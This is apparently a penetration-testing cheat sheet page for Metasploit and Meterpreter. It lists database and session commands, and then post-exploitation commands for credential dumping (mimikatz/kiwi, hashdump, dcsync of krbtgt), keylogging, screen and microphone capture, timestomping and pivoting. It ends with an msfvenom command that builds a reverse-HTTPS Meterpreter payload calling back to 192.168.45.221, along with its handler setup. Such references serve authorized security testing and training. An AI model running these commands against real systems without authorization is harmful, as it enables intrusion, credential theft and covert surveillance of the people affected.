Metasploit

Start database

sudo msfdb run

Database initialization

sudo msfdb init

Delete existing databases

msfdb --use-defaults delete

Database initialization

msfdb --use-defaults init

Database status

msfdb status

Workspaces management

msf6 > workspace                // list workspaces
msf6 > workspace -a <WORKSPACE> // add workspace
msf6 > workspace -r <WORKSPACE> // rename workspace
msf6 > workspace -d <WORKSPACE> // delete workspace
msf6 > workspace -D             // delete all workspaces

Nmap integration

msf6 > db_nmap <OPTIONS>        // run nmap and add output to database

Hosts and services

msf6 > hosts                    // read hosts from database
msf6 > services                 // read services from database
msf6 > vulns                    // show vulnerabilities

Searching and configuration

msf6 > search                   // search within metasploit
msf6 > set RHOST <RHOST>        // set remote host
msf6 > set RPORT <RPORT>        // set remote port
msf6 > set VERBOSE true         // enable verbose output
msf6 > set forceexploit true    // force exploit anyway
msf6 > set EXITFUNC thread      // reverse shell can exit without closing program
msf6 > set AutoLoadStdapi false // disable stdapi autoload
msf6 > set PrependMigrate true  // enable automatic migration
msf6 > set PrependMigrateProc explorer.exe // auto migrate to explorer.exe

Modules

msf6 > exploit                  // use exploit module
msf6 > payload                  // use payload module
msf6 > auxiliary                // use auxiliary module
msf6 > encoder                  // use encoder module
msf6 > nop                      // use nop module
msf6 > use post/PATH/TO/MODULE                    // use post exploitation module
msf6 > use post/linux/gather/hashdump             // hashdump on Linux
msf6 > use post/multi/manage/shell_to_meterpreter // shell to meterpreter
msf6 > use exploit/windows/http/oracle_event_processing_upload // specific module

Sessions

msf6 > show sessions            // show active sessions
msf6 > sessions -l              // list the sessions
msf6 > sessions -i 1            // switch to session 1
msf6 > sessions -u <ID>         // upgrade shell to meterpreter
msf6 > sessions -k <ID>         // kill specific session
msf6 > sessions -K              // kill all sessions

Jobs and payloads

msf6 > jobs                     // show current jobs
msf6 > show payloads            // show available payloads

Spool and save

msf6 > spool /PATH/TO/FILE      // record output
msf6 > save                     // save current state

Meterpreter - Basic operations

C:\> Ctrl + z                   // put active shell in background
meterpreter > loadstdapi        // load stdapi
meterpreter > background        // send session to background
meterpreter > shell             // get system shell
meterpreter > channel -i <ID>   // return to an existing meterpreter channel

Meterpreter - System info and migration

meterpreter > ps                // list processes
meterpreter > migrate 2236      // migrate to a process
meterpreter > getuid            // get current user
meterpreter > sysinfo           // get system information

Meterpreter - File and network operations

meterpreter > search -f <FILE>  // search for a file
meterpreter > upload            // upload local files
meterpreter > ipconfig          // network configuration
meterpreter > download <file>   // Download a file from the machine
meterpreter > lcd <path>        // cd in kali

PowerShell Integration

meterpreter > load powershell
meterpreter > powershell_shell
meterpreter > powershell_execute
meterpreter > powershell_import
meterpreter > powershell_session_remove
meterpreter > powershell_execute 'Get-NetNeighbor | Where-Object -Property State -NE "Unreachable" | Select-Object -Property IPAddress'
meterpreter > powershell_execute '1..254 | foreach { "<XXX.XXX.XXX>.${_}: $(Test-Connection -TimeoutSeconds 1 -Count 1 -ComputerName <XXX.XXX.XXX>.${_} -Quiet)" }'
meterpreter > powershell_execute 'Test-NetConnection -ComputerName <RHOST> -Port 80 | Select-Object -Property RemotePort, TcpTestSucceeded'

Mimikatz (Kiwi)

meterpreter > load kiwi
meterpreter > help kiwi
meterpreter > kiwi_cmd
meterpreter > lsa_dump_sam
meterpreter > dcsync_ntlm krbtgt
meterpreter > creds_all
meterpreter > creds_msv
meterpreter > creds_kerberos
meterpreter > creds_ssp
meterpreter > creds_wdigest
meterpreter > getprivs
meterpreter > getsystem
meterpreter > hashdump

Post-Exploitation Modules

meterpreter > run post/windows/gather/checkvm
meterpreter > run post/multi/recon/local_exploit_suggester
meterpreter > run post/windows/manage/enable_rdp
meterpreter > run post/multi/manage/autoroute
meterpreter > run auxiliary/server/socks4a

Keylogging & Screen

meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > screenshare
meterpreter > screenshare -q 100
meterpreter > record_mic

Timestomping & Execution

meterpreter > timestomp
meterpreter > execute -f calc.exe

Pivoting

msf6> route add 172.16.5.0/24 <session>
msf6> route print
msf6> use auxiliary/server/socks_proxy
msf6> set SRVHOST 127.0.0.1
msf6> set VERSION 5
msf6> run -j
kali@kali:~$ tail /etc/proxychains4.conf
#       proxy types: http, socks4, socks5, raw
#         * raw: The traffic is simply forwarded to the proxy without modification.
#        ( auth types supported: "basic"-http  "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 1080

kali@kali:~$ sudo proxychains xfreerdp /v:172.16.5.200 /u:luiza

Port Forwarding

meterpreter > portfwd add -l <LPORT> -p <RPORT> -r <RHOST>
kali@kali:~$ sudo xfreerdp /v:127.0.0.1 /u:luiza

Establish meterpreter reverse shell from compromised host

msfvenom -p windows/x64/meterpreter_reverse_https LHOST=192.168.45.221 LPORT=2233 -f exe -o met.exe
msf6 > set payload windows/x64/meterpreter_reverse_https 
msf6 > set lhost 192.168.45.221
msf6 > set lport 2233
msf6 > exploit -j
PreviousPayloadsNextMiscellaneaous

Last updated